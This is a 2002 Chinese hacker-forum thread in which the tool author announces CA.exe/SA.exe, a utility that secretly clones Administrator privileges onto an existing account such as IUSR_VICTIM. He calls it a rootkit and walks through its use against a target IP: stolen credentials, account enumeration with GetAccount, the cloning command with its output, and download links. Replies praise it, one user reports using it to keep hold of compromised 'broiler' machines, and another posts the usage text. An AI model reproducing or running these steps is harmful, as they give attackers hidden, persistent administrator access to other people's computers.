>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  克隆 Administrator
发表文章 发表涂鸦
  回复数:119  点击数:10071 将此页发给您的朋友        
作者 主题: 克隆 Administrator ( 页: 1 2 3 4 5 6 7 8 ) 回复 | 收藏 | 打印 | 篇末
小榕帅哥哦
级别:管 理 员
威望:0
经验:2
货币:2638
体力:100
来源:211.161.43.*
总发帖数:621
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

今天在NSFOCUS上面看到关于克隆系统帐号的文章,于是写了这个小工具CA(Clone Administrator)。

利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT.

用一个例子说明用法:

1、假定我们通过扫描器获得了192.168.0.1上用户test的密码为test(属于administrators组).

2、利用GetAccount(http://www.netXeyes.com/cgi-bin/GetAccount.exe)获得系统中已经存在的帐号信息(当然利用空连接也可以)。

C:\>getaccount \\192.168.0.1 1

GetAccount Via SID, by netXeyes 2002/04/06

Connect Host 192.168.0.1 ....OK

Start Ememurate Account....

Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators

Disconnect Host 192.168.0.1 ....OK

3、利用SA.exe 将Iusr_victim克隆为Administrator。

C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK

C:\>

这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。

在192.168.0.1上面用Net命令查看的结果:

User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User's comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02

Logon hours allowed All

Local Group Memberships *Guests
Global Group memberships *None

下载: http://www.netXeyes.com/cgi-bin/CA.exe



[ 此消息由 小榕 在 2002-04-28.23:17:34 编辑过 ]
----------------------------------------------------------
相爱的时光太短,遗忘的过程太长。也许我们只是人生轨迹的一个交点
编辑 删除 发表时间发表于 2002-04-28.23:06:06  MSIE 6.0 Windows 2000IP: 已记录
小蔡帅哥哦
级别:精灵王
威望:0
经验:27
货币:3111
体力:100
来源:四川
总发帖数:439
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

http://www.landun.org/wenzhang/images/xiaoran/article/214.html
编辑 删除 发表时间发表于 2002-04-28.23:13:36  MSIE 5.01 Windows 2000IP: 已记录
小蔡帅哥哦
级别:精灵王
威望:0
经验:27
货币:3111
体力:100
来源:四川
总发帖数:439
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

榕G看一下
编辑 删除 发表时间发表于 2002-04-28.23:14:14  MSIE 5.01 Windows 2000IP: 已记录
永远的FLASH帅哥哦
级别:刀光雪影版主
威望:3
经验:1
货币:5852
体力:100
来源:江苏
总发帖数:2264
注册日期:2002-02-11
查看 邮件 主页 QQ 消息 引用 复制 下载 

cool!
----------------------------------------------------------
H4技术组:http://www.h4h4.com
编辑 删除 发表时间发表于 2002-04-28.23:53:27  MSIE 6.0 Windows 2000IP: 已记录
神仙姐姐美女哟
级别:风云使者
威望:0
经验:9
货币:3051
体力:32
来源:紫禁城
总发帖数:1081
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

感谢榕哥又给我们提供个好东东:)
----------------------------------------------------------
淡泊明志,宁静至远;请别害我,我是好人!
编辑 删除 发表时间发表于 2002-04-28.23:56:21  MSIE 5.0 Windows 98IP: 已记录
yaodao帅哥哦
级别:高级站友
威望:0
经验:0
货币:352
体力:13.9
来源:湖北
总发帖数:165
注册日期:2002-03-11
查看 邮件 主页 QQ 消息 引用 复制 下载 

榕哥辛苦了!
编辑 删除 发表时间发表于 2002-04-29.00:17:09  MSIE 6.0 Windows 98IP: 已记录
风子帅哥哦
级别:精灵王
威望:0
经验:15
货币:2048
体力:99
来源:61.154.30.*
总发帖数:673
注册日期:2001-05-26
查看 邮件 主页 QQ 消息 引用 复制 下载 

这个好用
----------------------------------------------------------
世界最强的站点http://cschina.org
最安全的论坛http://218.98.0.204
编辑 删除 发表时间发表于 2002-04-29.01:38:35  MSIE 6.0 Windows 98IP: 已记录
wendy帅哥哦
级别:精灵王
威望:0
经验:0
货币:1991
体力:73.3
来源:bbs.ccxx.net
总发帖数:985
注册日期:2002-03-11
查看 邮件 主页 QQ 消息 引用 复制 下载 

辛苦了
----------------------------------------------------------
hacker精神只是从各行各业中的最优秀精神的结晶,以此更正大家对它的认识!

欢迎到bbs.wwenglish.org

交流英语 或网络技术
编辑 删除 发表时间发表于 2002-04-29.01:40:44  MSIE 5.0 Windows 98IP: 已记录
愚人帅哥哦
级别:本站元老
威望:2
经验:1
货币:5046
体力:100
来源:袄饿日反对撒
总发帖数:1577
注册日期:2002-01-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

榕哥首页的那个连接好象错了,写的是CA.exe,可连接是GetAccount.exe
这个的!
编辑 删除 发表时间发表于 2002-04-29.02:29:33  MSIE 5.01 Windows 2000IP: 已记录
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

试了下,很不错,这样肉机就更不容易丢了,哈哈哈
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗
编辑 删除 发表时间发表于 2002-04-29.03:30:07  MSIE 6.0 Windows 2000IP: 已记录
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

请看这个截图

这是肉机上实验的结果,用后,虽然在tsinternetuser属性里看的确是看不到属于administrators组,但在administrators组的属性里能看到tsinternetuser属于这个组,而本身的administrator这个用户却看不见了,我想仔细的管理员还是能发现这点的!
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗
编辑 删除 发表时间发表于 2002-04-29.03:45:23  MSIE 6.0 Windows 2000IP: 已记录
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

不知道其他人的习惯是怎么样的,反正我进了3389肉机后地一件事就是在组属性里看看有哪些用户属于administrators组,这样比一个用户一个用户查起来快!
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗
编辑 删除 发表时间发表于 2002-04-29.03:50:10  MSIE 6.0 Windows 2000IP: 已记录
ddxxbb帅哥哦
级别:老 站 友
威望:0
经验:0
货币:109
体力:4.3
来源:218.10.121.*
总发帖数:421
注册日期:2001-12-09
查看 邮件 主页 QQ 消息 引用 复制 下载 

http://www.netxeyes.com/ca.exe
----------------------------------------------------------
编辑 删除 发表时间发表于 2002-04-29.04:01:03  MSIE 6.0 Windows 98IP: 已记录
傲气雄鹰帅哥哦
级别:本论坛版主
威望:0
经验:19
货币:3335
体力:100
来源:云南昆明
总发帖数:1559
注册日期:2002-01-21
查看 邮件 主页 QQ 消息 引用 复制 下载 

太COOL了
----------------------------------------------------------
本论坛不欢迎如下类型的帖子,此类帖子会被关闭或删除,本人恕不回复。
一,刀光雪影完全无关
二,无内容或内容过于简单,标题无意义的
三,个人联系的帖子。和标题为“某某请进”之类的
四,要求代破密码的
五,同一帖子多次重复的,灌水的
六,政治敏感话题,语言不文明,攻击他人的
七,溯雪手册中已有详细介绍或前面帖子中已有大量回复的
编辑 删除 发表时间发表于 2002-04-29.07:31:12  MSIE 5.01 Windows 2000IP: 已记录
BEYOND帅哥哦
级别:长 老 级
威望:0
经验:0
货币:137
体力:4.9
来源:218.24.128.*
总发帖数:633
注册日期:2002-02-07
查看 邮件 主页 QQ 消息 引用 复制 下载 

容哥啊我怎么DOWN不下来啊
----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』        『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤ 黑██客 ◥◣','〃,〃       ','〃,〃◢◤ 黑██客 ◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃       ','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』        『雪』''◢◤↗蓝◥◤客↖◥◣''『影』
编辑 删除 发表时间发表于 2002-04-29.08:46:44  MSIE 5.01 Windows 2000IP: 已记录
kker帅哥哦
级别:精灵
威望:4
经验:0
货币:676
体力:24.9
来源:202.33.226.*
总发帖数:632
注册日期:2001-06-01
查看 邮件 主页 QQ 消息 引用 复制 下载 



榕哥 4月28的版本帮助中有一小别字,帮助中用的程序名与实际不符,呵.

D:\>ca
Shadow Administrator, by netXeyes 2002/04/28
Written by netXeyes 2002, dansnow@21cn.com

Usage: SA \\IP Account Password CloneAccount ClonePassword

Account: Username (Own Administrator Privilege)
Password: Password of User
CloneAccount: CloneUser's Account Name (Must Already Exsited)
ClonePassword: Set Password of CloneUser

Examples:
=========
SA.exe\\192.168.0.16 Administrator Password IUSR_VICTIM SetNewPass

Clone Privillege of Administrator to IUSR_VICTIM,
And Set IUSR_VICTIM Password to "SetNewPass"
----------------------------------------------------------
你的眼睛眨一眨,我就死去;
你的眼睛再眨一眨,我又活过来;
你的眼睛眨来眨去,于是我就死去活来。
编辑 删除 发表时间发表于 2002-04-29.09:14:04  MSIE 5.01 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 8 票  
所有时间均为: 北京时间 ↑TOP [第 1 2 3 4 5 6 7 8 页]
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题